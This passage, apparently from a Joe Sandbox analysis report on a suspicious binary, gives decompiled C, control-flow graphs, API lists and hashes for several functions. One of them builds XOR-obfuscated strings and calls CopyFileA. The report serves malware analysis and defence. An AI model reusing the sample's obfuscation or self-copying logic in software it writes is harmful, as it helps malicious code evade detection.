							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(L00873C91(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(L00873CA4(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(L00873C91(_t246)) =  *_t197 & 0x00000000;
					_t139 = L00873CA4(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}





















































                                    0x008844ff
                                    0x00884503
                                    0x00884506
                                    0x00884520
                                    0x00884522
                                    0x00884887
                                    0x00884887
                                    0x0088488c
                                    0x0088488c
                                    0x00884894
                                    0x0088489a
                                    0x0088489a
                                    0x00000000
                                    0x0088489a
                                    0x00884528
                                    0x0088452e
                                    0x00000000
                                    0x00000000
                                    0x00884538
                                    0x0088453e
                                    0x00884541
                                    0x00884544
                                    0x0088454e
                                    0x00884551
                                    0x00884554
                                    0x00884558
                                    0x0088455a
                                    0x00000000
                                    0x00000000
                                    0x00884560
                                    0x00884563
                                    0x00884569
                                    0x00884583
                                    0x00884585
                                    0x00884883
                                    0x00000000
                                    0x00884883
                                    0x0088458b
                                    0x0088458e
                                    0x00000000
                                    0x00000000
                                    0x00884594
                                    0x00884598
                                    0x00000000
                                    0x00000000
                                    0x0088459e
                                    0x008845a1
                                    0x008845a5
                                    0x008845ac
                                    0x008845ae
                                    0x008845ae
                                    0x008845b1
                                    0x00884606
                                    0x00884608
                                    0x008845ce
                                    0x008845d3
                                    0x008845da
                                    0x008845e0
                                    0x00000000
                                    0x0088460a
                                    0x0088460c
                                    0x0088460d
                                    0x0088460f
                                    0x00884612
                                    0x00884614
                                    0x00884616
                                    0x00884618
                                    0x00884618
                                    0x00884623
                                    0x00884625
                                    0x0088462c
                                    0x00884631
                                    0x00884634
                                    0x00884637
                                    0x00884639
                                    0x0088465d
                                    0x00884665
                                    0x00884668
                                    0x0088466f
                                    0x00884676
                                    0x0088467a
                                    0x0088467c
                                    0x0088467f
                                    0x00884686
                                    0x00884686
                                    0x00884689
                                    0x0088468b
                                    0x0088468e
                                    0x00884693
                                    0x00884696
                                    0x0088469f
                                    0x008846a3
                                    0x008846a6
                                    0x008846a8
                                    0x008846ae
                                    0x008846b0
                                    0x008846b9
                                    0x008846ba
                                    0x008846bc
                                    0x008846c0
                                    0x008846c1
                                    0x008846c5
                                    0x008846c8
                                    0x008846d2
                                    0x008846d7
                                    0x008846da
                                    0x008846e9
                                    0x008846ed
                                    0x008846f0
                                    0x008846f2
                                    0x008846f4
                                    0x008846f6
                                    0x008846fb
                                    0x008846fd
                                    0x00884701
                                    0x00884702
                                    0x00884708
                                    0x00884712
                                    0x00884713
                                    0x00884716
                                    0x0088471b
                                    0x0088471e
                                    0x0088472d
                                    0x00884731
                                    0x00884734
                                    0x00884736
                                    0x00884738
                                    0x0088473a
                                    0x0088473c
                                    0x00884742
                                    0x00884742
                                    0x00884743
                                    0x00884752
                                    0x00884755
                                    0x00884756
                                    0x00884756
                                    0x0088473a
                                    0x00884736
                                    0x0088471e
                                    0x008846f6
                                    0x008846f2
                                    0x008846da
                                    0x008846b0
                                    0x008846a8
                                    0x0088475c
                                    0x00884762
                                    0x00884764
                                    0x008847d7
                                    0x008847d7
                                    0x008847db
                                    0x008847eb
                                    0x008847f1
                                    0x008847f3
                                    0x0088484f
                                    0x0088484f
                                    0x00884857
                                    0x00884858
                                    0x0088485a
                                    0x00884873
                                    0x00884876
                                    0x008847b3
                                    0x008847b4
                                    0x00000000
                                    0x008847b9
                                    0x0088487c
                                    0x00000000
                                    0x0088487c
                                    0x00884861
                                    0x0088486c
                                    0x00000000
                                    0x0088486c
                                    0x008847f5
                                    0x008847f8
                                    0x008847fb
                                    0x00000000
                                    0x00000000
                                    0x008847fd
                                    0x008847fd
                                    0x00884800
                                    0x00884803
                                    0x00884806
                                    0x0088480d
                                    0x00884812
                                    0x00884814
                                    0x00884818
                                    0x00884833
                                    0x00884837
                                    0x00884838
                                    0x0088483b
                                    0x0088483c
                                    0x00884848
                                    0x0088483e
                                    0x0088483e
                                    0x0088483e
                                    0x0088481a
                                    0x0088481a
                                    0x0088481a
                                    0x00884825
                                    0x0088482a
                                    0x0088482d
                                    0x0088482d
                                    0x00000000
                                    0x00884812
                                    0x00884769
                                    0x0088476c
                                    0x00884773
                                    0x00884778
                                    0x00000000
                                    0x00000000
                                    0x0088477e
                                    0x00884781
                                    0x00884787
                                    0x00884789
                                    0x00000000
                                    0x00000000
                                    0x0088478b
                                    0x0088478f
                                    0x00000000
                                    0x00000000
                                    0x008847a3
                                    0x008847a9
                                    0x008847ab
                                    0x008847cf
                                    0x008847d2
                                    0x00000000
                                    0x008847d2
                                    0x008847ad
                                    0x00000000
                                    0x0088463b
                                    0x00884640
                                    0x0088464b
                                    0x008847ba
                                    0x008847ba
                                    0x008847ba
                                    0x008847bd
                                    0x008847be
                                    0x00000000
                                    0x008847c6
                                    0x00884639
                                    0x00884608
                                    0x008845b3
                                    0x008845b6
                                    0x008845ca
                                    0x008845cc
                                    0x008845ed
                                    0x008845f0
                                    0x008845f3
                                    0x008845f6
                                    0x00000000
                                    0x008845f6
                                    0x00000000
                                    0x008845b8
                                    0x008845b8
                                    0x008845bb
                                    0x008845be
                                    0x00000000
                                    0x008845be
                                    0x008845b6
                                    0x0088456b
                                    0x00884570
                                    0x00884578
                                    0x00000000
                                    0x00884508
                                    0x0088450d
                                    0x00884510
                                    0x00884515
                                    0x0088489f
                                    0x00000000
                                    0x0088489f

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3907804496
                                    • Opcode ID: e1596852c0f8c20596b9fab188e6bf32a39aa8ccd8bcedf07764782f85a264a7
                                    • Instruction ID: 4ac2438901daf4fcdeb27f37e1a34f6121f21c84c97f70dc7b38b7dfb891479b
                                    • Opcode Fuzzy Hash: e1596852c0f8c20596b9fab188e6bf32a39aa8ccd8bcedf07764782f85a264a7
                                    • Instruction Fuzzy Hash: B4C11276A0424A9FDF11FF98D881BADBBB0FF99304F045159E514EB382D7309A01CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088C47C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2607 88c47c-88c4ac call 88c1ca 2610 88c4ae-88c4b9 call 873c91 2607->2610 2611 88c4c7-88c4d3 call 88900e 2607->2611 2616 88c4bb-88c4c2 call 873ca4 2610->2616 2617 88c4ec-88c535 call 88c135 2611->2617 2618 88c4d5-88c4ea call 873c91 call 873ca4 2611->2618 2625 88c7a1-88c7a5 2616->2625 2627 88c5a2-88c5ab GetFileType 2617->2627 2628 88c537-88c540 2617->2628 2618->2616 2631 88c5ad-88c5de GetLastError __dosmaperr CloseHandle 2627->2631 2632 88c5f4-88c5f7 2627->2632 2629 88c542-88c546 2628->2629 2630 88c577-88c59d GetLastError __dosmaperr 2628->2630 2629->2630 2634 88c548-88c575 call 88c135 2629->2634 2630->2616 2631->2616 2635 88c5e4-88c5ef call 873ca4 2631->2635 2636 88c5f9-88c5fe 2632->2636 2637 88c600-88c606 2632->2637 2634->2627 2634->2630 2635->2616 2640 88c60a-88c658 call 888f59 2636->2640 2637->2640 2641 88c608 2637->2641 2646 88c65a-88c666 call 88c344 2640->2646 2647 88c677-88c69f call 88bee2 2640->2647 2641->2640 2646->2647 2652 88c668 2646->2652 2653 88c6a1-88c6a2 2647->2653 2654 88c6a4-88c6e5 2647->2654 2655 88c66a-88c672 call 8810e3 2652->2655 2653->2655 2656 88c706-88c714 2654->2656 2657 88c6e7-88c6eb 2654->2657 2655->2625 2658 88c71a-88c71e 2656->2658 2659 88c79f 2656->2659 2657->2656 2661 88c6ed-88c701 2657->2661 2658->2659 2662 88c720-88c753 CloseHandle call 88c135 2658->2662 2659->2625 2661->2656 2666 88c755-88c781 GetLastError __dosmaperr call 889121 2662->2666 2667 88c787-88c79b 2662->2667 2666->2667 2667->2659
                                    C-Code - Quality: 43%
                                    			E0088C47C(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				void* _t239;
				signed char _t242;
				signed int _t243;
				intOrPtr _t247;
				void* _t254;
				void* _t264;
				signed int _t265;
				signed int _t268;
				signed int _t269;
				signed int _t272;
				void* _t274;
				void* _t276;
				void* _t277;
				void* _t279;
				void* _t280;
				void* _t282;
				void* _t286;
				signed int _t290;

				_t239 = __edx;
				_t264 = E0088C1CA(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t264, _t191 << 2);
				_t276 = _t274 + 0x1c;
				_t265 = _t264 | 0xffffffff;
				_t289 = _v36 - _t265;
				if(_v36 != _t265) {
					_t114 = E0088900E(_t188, 0, _t239, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t265;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t277 = _t276 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t277,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E0088C135(); // executed
						_t254 = _t122;
						_t279 = _t277 + 0x2c;
						_v12 = _t254;
						__eflags = _t254 - 0xffffffff;
						if(_t254 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t254); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								L00888F59(_t196, _t254,  *_t189, _t254);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x8b44f0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t242;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x8b44f0 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t280 = _t279 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t280,  &_v48, _t205 << 2);
									_t134 = L0088BEE2(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t243 =  *_t189;
									_t268 = _t134;
									_t282 = _t280 + 0x30;
									__eflags = _t268;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x8b44f0 + (_t243 >> 6) * 4)) + 0x29 + (_t243 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x8b44f0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x8b44f0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x8b44f0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x8b44f0 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t269 = _v44;
										__eflags = (_t269 & 0xc0000000) - 0xc0000000;
										if((_t269 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t269 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t282 - 0x18,  &_v48, _t214 << 2);
											_t247 = E0088C135();
											__eflags = _t247 - 0xffffffff;
											if(_t247 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x8b44f0 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t247;
												goto L32;
											}
											L00873C6E(GetLastError());
											 *( *((intOrPtr*)(0x8b44f0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x8b44f0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00889121( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t243);
									goto L21;
								} else {
									_t268 = E0088C344(_t204,  *_t189);
									__eflags = _t268;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E008810E3(__eflags);
									return _t268;
								}
							}
							_t272 = GetLastError();
							L00873C6E(_t272);
							 *( *((intOrPtr*)(0x8b44f0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x8b44f0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t254);
							__eflags = _t272;
							if(__eflags == 0) {
								 *((intOrPtr*)(L00873CA4(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x8b44f0 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							L00873C6E(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t286 = _t279 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t286,  &_v48, _t238 << 2);
						_t196 = 0;
						_t254 = E0088C135();
						_t279 = _t286 + 0x2c;
						_v12 = _t254;
						__eflags = _t254 - 0xffffffff;
						if(_t254 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(L00873C91(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t265;
						 *((intOrPtr*)(L00873CA4(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = L00873C91(_t289);
					 *_t186 =  *_t186 & 0x00000000;
					_t290 =  *_t186;
					 *_a8 = _t265;
					L2:
					return  *((intOrPtr*)(L00873CA4(_t290)));
				}
			}


























































                                    0x0088c47c
                                    0x0088c49f
                                    0x0088c4a3
                                    0x0088c4a4
                                    0x0088c4a4
                                    0x0088c4a6
                                    0x0088c4a9
                                    0x0088c4ac
                                    0x0088c4c7
                                    0x0088c4cc
                                    0x0088c4cf
                                    0x0088c4d1
                                    0x0088c4d3
                                    0x0088c4f2
                                    0x0088c4f9
                                    0x0088c500
                                    0x0088c503
                                    0x0088c50f
                                    0x0088c512
                                    0x0088c51a
                                    0x0088c51b
                                    0x0088c51e
                                    0x0088c51e
                                    0x0088c520
                                    0x0088c525
                                    0x0088c527
                                    0x0088c52a
                                    0x0088c532
                                    0x0088c535
                                    0x0088c5a2
                                    0x0088c5a3
                                    0x0088c5a9
                                    0x0088c5ab
                                    0x0088c5f4
                                    0x0088c5f7
                                    0x0088c600
                                    0x0088c603
                                    0x0088c606
                                    0x0088c608
                                    0x0088c608
                                    0x0088c608
                                    0x0088c5f9
                                    0x0088c5fc
                                    0x0088c5fc
                                    0x0088c60d
                                    0x0088c610
                                    0x0088c61c
                                    0x0088c621
                                    0x0088c62d
                                    0x0088c637
                                    0x0088c63b
                                    0x0088c645
                                    0x0088c648
                                    0x0088c653
                                    0x0088c658
                                    0x0088c677
                                    0x0088c67a
                                    0x0088c67e
                                    0x0088c67f
                                    0x0088c685
                                    0x0088c68a
                                    0x0088c68d
                                    0x0088c68f
                                    0x0088c691
                                    0x0088c696
                                    0x0088c698
                                    0x0088c69a
                                    0x0088c69d
                                    0x0088c69f
                                    0x0088c6b9
                                    0x0088c6dd
                                    0x0088c6e1
                                    0x0088c6e5
                                    0x0088c6e7
                                    0x0088c6eb
                                    0x0088c6ed
                                    0x0088c6f7
                                    0x0088c6fa
                                    0x0088c701
                                    0x0088c701
                                    0x0088c701
                                    0x0088c701
                                    0x0088c6eb
                                    0x0088c706
                                    0x0088c712
                                    0x0088c714
                                    0x0088c79f
                                    0x0088c79f
                                    0x00000000
                                    0x0088c71a
                                    0x0088c71a
                                    0x0088c71e
                                    0x00000000
                                    0x00000000
                                    0x0088c723
                                    0x0088c735
                                    0x0088c73d
                                    0x0088c740
                                    0x0088c741
                                    0x0088c744
                                    0x0088c74b
                                    0x0088c750
                                    0x0088c753
                                    0x0088c787
                                    0x0088c791
                                    0x0088c791
                                    0x0088c79b
                                    0x00000000
                                    0x0088c79b
                                    0x0088c75c
                                    0x0088c775
                                    0x0088c77c
                                    0x0088c59c
                                    0x00000000
                                    0x0088c59c
                                    0x0088c714
                                    0x0088c6a1
                                    0x00000000
                                    0x0088c65a
                                    0x0088c661
                                    0x0088c664
                                    0x0088c666
                                    0x00000000
                                    0x00000000
                                    0x0088c668
                                    0x0088c66a
                                    0x0088c66a
                                    0x00000000
                                    0x0088c670
                                    0x0088c658
                                    0x0088c5b3
                                    0x0088c5b6
                                    0x0088c5d1
                                    0x0088c5d6
                                    0x0088c5dc
                                    0x0088c5de
                                    0x0088c5e9
                                    0x0088c5e9
                                    0x00000000
                                    0x0088c5de
                                    0x0088c537
                                    0x0088c53e
                                    0x0088c540
                                    0x0088c577
                                    0x0088c577
                                    0x0088c581
                                    0x0088c584
                                    0x0088c58b
                                    0x0088c58b
                                    0x0088c58b
                                    0x0088c597
                                    0x00000000
                                    0x0088c597
                                    0x0088c542
                                    0x0088c546
                                    0x00000000
                                    0x00000000
                                    0x0088c548
                                    0x0088c557
                                    0x0088c55c
                                    0x0088c55f
                                    0x0088c560
                                    0x0088c563
                                    0x0088c563
                                    0x0088c56a
                                    0x0088c56c
                                    0x0088c56f
                                    0x0088c572
                                    0x0088c575
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0088c4d5
                                    0x0088c4da
                                    0x0088c4dd
                                    0x0088c4e4
                                    0x00000000
                                    0x0088c4e4
                                    0x0088c4ae
                                    0x0088c4ae
                                    0x0088c4b3
                                    0x0088c4b3
                                    0x0088c4b9
                                    0x0088c4bb
                                    0x00000000
                                    0x0088c4c0

                                    APIs
                                      • Part of subcall function 0088C135: CreateFileW.KERNELBASE(00000000,00000000,?,0088C525,?,?,00000000,?,0088C525,00000000,0000000C), ref: 0088C152
                                    • GetLastError.KERNEL32 ref: 0088C590
                                    • __dosmaperr.LIBCMT ref: 0088C597
                                    • GetFileType.KERNELBASE(00000000), ref: 0088C5A3
                                    • GetLastError.KERNEL32 ref: 0088C5AD
                                    • __dosmaperr.LIBCMT ref: 0088C5B6
                                    • CloseHandle.KERNEL32(00000000), ref: 0088C5D6
                                    • CloseHandle.KERNEL32(00880CCF), ref: 0088C723
                                    • GetLastError.KERNEL32 ref: 0088C755
                                    • __dosmaperr.LIBCMT ref: 0088C75C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: 614dc5fe5c664d8b081503a674f2a09a3396d294d2731eb9e230edfd8e62f699
                                    • Instruction ID: c813276f57de9812a7171c5e595350b8a2b455cf225ec136813cfb29daa45a9d
                                    • Opcode Fuzzy Hash: 614dc5fe5c664d8b081503a674f2a09a3396d294d2731eb9e230edfd8e62f699
                                    • Instruction Fuzzy Hash: 5FA12432A141448FCF19EF7CDC927AE3BA0FB46324F184159F805EB296DB359912CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081DDC0 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 297fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2670 81ddc0-81deb7 call 890cfc call 818f5d * 2 call 82e8c7 call 82fa3b call 82e917 call 82fa3b call 82df41 * 5 2695 81def2-81def9 2670->2695 2696 81deb9-81decb call 86db91 2670->2696 2698 81defb 2695->2698 2699 81df0a-81df2d 2695->2699 2696->2695 2704 81decd-81def1 call 86dfe8 call 86db47 2696->2704 2701 81defd-81df08 2698->2701 2702 81df6a-81df71 2699->2702 2703 81df2f-81df41 call 86db91 2699->2703 2701->2699 2701->2701 2705 81df73 2702->2705 2706 81df82-81dfc7 call 82da74 2702->2706 2703->2702 2712 81df43-81df69 call 86dfe8 call 86db47 2703->2712 2704->2695 2710 81df75-81df80 2705->2710 2717 81dfc9-81dfdc call 86db91 2706->2717 2718 81dffe-81e005 2706->2718 2710->2706 2710->2710 2712->2702 2717->2718 2730 81dfde-81dffd call 82d272 call 86dfe8 call 86db47 2717->2730 2720 81e007 2718->2720 2721 81e016-81e09e call 82da74 call 82bb72 call 82e917 call 82df41 call 82fec9 call 813174 call 82dd77 2718->2721 2725 81e009-81e014 2720->2725 2749 81e0a4-81e0fe call 82fec9 call 813225 call 82dd77 CopyFileA 2721->2749 2750 81e1c9-81e1e9 call 82fec9 call 813225 2721->2750 2725->2721 2725->2725 2730->2718 2749->2750 2764 81e104-81e144 2749->2764 2758 81e1ee-81e23d call 82dd77 call 82df41 * 2 2750->2758 2765 81e146-81e159 call 86db91 2764->2765 2766 81e17b-81e182 2764->2766 2765->2766 2776 81e15b-81e17a call 82d1e6 call 86dfe8 call 86db47 2765->2776 2770 81e193-81e1bf call 8183df 2766->2770 2771 81e184 2766->2771 2770->2750 2774 81e186-81e191 2771->2774 2774->2770 2774->2774 2776->2766
                                    C-Code - Quality: 74%
                                    			E0081DDC0(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* _t114;
				void* _t117;
				void* _t119;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t130;
				void* _t132;
				void* _t146;
				intOrPtr _t153;
				signed char _t155;
				void* _t156;
				int _t157;
				int _t163;
				int _t169;
				int _t173;
				CHAR* _t215;
				intOrPtr _t216;
				void* _t225;
				void* _t227;
				void* _t230;
				void* _t231;
				void* _t241;
				intOrPtr* _t242;
				void* _t250;
				void* _t254;
				void* _t256;
				intOrPtr* _t257;
				void* _t263;

				_t263 = __eflags;
				L00890CFC(0x89262a, __ebx, __ecx, __edx);
				_t257 = _t256 - 0xf8;
				_push(__ebx);
				 *((intOrPtr*)(_t254 - 0x10)) = _t257;
				_t230 = 8;
				_t241 = L00818F5D(__ebx, _t254 - 0x54, _t230);
				_t231 = 4;
				 *((intOrPtr*)(_t254 - 4)) = 0;
				_t114 = L00818F5D(0, _t254 - 0xec, _t231);
				 *((char*)(_t254 - 4)) = 1;
				_t117 = E0082E8C7(0, _t254 - 0xd4, 0x8b2a8c, _t241);
				 *((char*)(_t254 - 4)) = 2;
				E0082FA3B(_t254 - 0xa0,  *((intOrPtr*)(_t254 - 0x14)), _t117, _t114, "\\");
				 *((char*)(_t254 - 4)) = 3;
				_t119 = E0082E917(_t254 - 0xbc, _t254 - 0xa0, _t263, ".");
				_push(_t241);
				_push(_t119);
				 *((char*)(_t254 - 4)) = 4;
				_push( *((intOrPtr*)(_t254 - 0x14)));
				E0082FA3B(_t254 - 0x70);
				E0082DF41(_t254 - 0xbc);
				E0082DF41(_t254 - 0xa0);
				E0082DF41(_t254 - 0xd4);
				E0082DF41(_t254 - 0xec);
				 *((char*)(_t254 - 4)) = 0xa;
				E0082DF41(_t254 - 0x54);
				 *((intOrPtr*)(_t254 - 0x28)) = 0x424f5972;
				 *((intOrPtr*)(_t254 - 0x24)) = 0x5a4b42;
				 *((intOrPtr*)(_t254 - 0x20)) = 0x2e5a4f4a;
				_t242 =  *((intOrPtr*)( *[fs:0x2c]));
				_t127 =  *0x8b5e58; // 0x8000005a
				 *((intOrPtr*)(_t254 - 0x14)) = _t242;
				if(_t127 >  *((intOrPtr*)(_t242 + 4))) {
					E0086DB91(_t127, 0x8b5e58);
					_t265 =  *0x8b5e58 - 0xffffffff;
					_pop(_t227);
					if( *0x8b5e58 == 0xffffffff) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						L0086DFE8(_t227, _t265, 0x8959c7);
						 *_t257 = 0x8b5e58;
						L0086DB47();
						_t242 =  *((intOrPtr*)(_t254 - 0x14));
					}
				}
				if( *0x8b56d3 == 0) {
					L6:
					_t128 =  *0x8b4e98; // 0x8000005b
					 *((intOrPtr*)(_t254 - 0x28)) = 0x6a5c5a5d;
					 *((intOrPtr*)(_t254 - 0x24)) = 0x6a4f5a4f;
					 *((short*)(_t254 - 0x20)) = 0x5c47;
					 *((char*)(_t254 - 0x1e)) = 0x2e;
					if(_t128 >  *((intOrPtr*)(_t242 + 4))) {
						E0086DB91(_t128, 0x8b4e98);
						_t269 =  *0x8b4e98 - 0xffffffff;
						_pop(_t225);
						if( *0x8b4e98 == 0xffffffff) {
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							L0086DFE8(_t225, _t269, 0x8959d4);
							 *_t257 = 0x8b4e98;
							L0086DB47();
							_t242 =  *((intOrPtr*)(_t254 - 0x14));
						}
					}
					if( *0x8b4caa == 0) {
						L12:
						_t258 = _t257 - 0x18;
						 *((intOrPtr*)(_t254 - 0x14)) = _t257 - 0x18;
						E0082DA74(_t258, 0x8b4ca0);
						 *((char*)(_t254 - 4)) = 0xb;
						asm("movaps xmm0, [0x8a8ea0]");
						_t130 =  *0x8b517c; // 0x8000005c
						asm("movups [ebp-0x38], xmm0");
						 *((intOrPtr*)(_t254 - 0x28)) = 0x476c7240;
						 *((intOrPtr*)(_t254 - 0x24)) = 0x47414d5a;
						 *((intOrPtr*)(_t254 - 0x20)) = 0x5a7f0340;
						 *((char*)(_t254 - 0x1c)) = 0x2e;
						if(_t130 >  *((intOrPtr*)(_t242 + 4))) {
							E0086DB91(_t130, 0x8b517c);
							_t273 =  *0x8b517c - 0xffffffff;
							if( *0x8b517c == 0xffffffff) {
								E0082D272(0x8b4ea0, _t254 - 0x38);
								L0086DFE8(0x8b4ea0, _t273, 0x8959e3);
								L0086DB47(0x8b517c);
							}
						}
						if( *0x8b4ebc == 0) {
							L18:
							E0082DA74(_t258 - 0x18, 0x8b4ea0);
							 *((char*)(_t254 - 4)) = 0xa;
							_t132 = E0082BB72(0, _t254 - 0x104, 0x80000001);
							 *((char*)(_t254 - 4)) = 0xc;
							E0082E917(_t254 - 0x88, _t132, _t275, 0x8b56c8);
							E0082DF41(_t254 - 0x104);
							 *((char*)(_t254 - 4)) = 0xf;
							 *((char*)(_t254 - 0x14)) = 0;
							_push( *((intOrPtr*)(_t254 - 0x14)));
							L0082FEC9(_t254 - 0x88);
							 *((char*)(_t254 - 4)) = 0x10;
